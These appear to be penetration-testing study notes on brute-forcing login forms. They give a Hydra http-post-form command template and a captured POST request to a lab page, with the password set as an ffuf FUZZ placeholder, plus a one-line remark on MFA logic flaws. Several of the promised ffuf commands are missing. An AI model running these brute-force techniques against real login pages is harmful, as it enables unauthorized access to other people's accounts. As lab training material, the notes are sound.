Authentication Attacks
Brute Force
Burpsuite
Grabbing the POST request in the http history under the proxy and sending that to intruder is an easy way to manage this. You will be throttled on the community edition
Hydra
hydra -l [login] -P [pass list] [target] -s [port] http-post-form "/[endpoint.ext]:[userparam]=^USER^&[passparam]=^PASS^:F=[failure string]"FFUF
Taking the POST request from BurpSuite and making a file out of it to feed to ffuf works great, replacing the target with the FUZZ operator:
POST /labs/a0x01.php HTTP/1.1
Host: 100.79.20.39
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:146.0) Gecko/20100101 Firefox/146.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: http://100.79.20.39
Connection: keep-alive
Referer: http://100.79.20.39/labs/a0x01.php
Upgrade-Insecure-Requests: 1
Priority: u=0, i
username=jeremy&password=FUZZThen, run ffuf using the request:
We can also use multiple FUZZ operators in our request file:
And use clusterbomb mode:
MFA
Things like this need to be looked at logically. Try to find any flaws in the flow
Last updated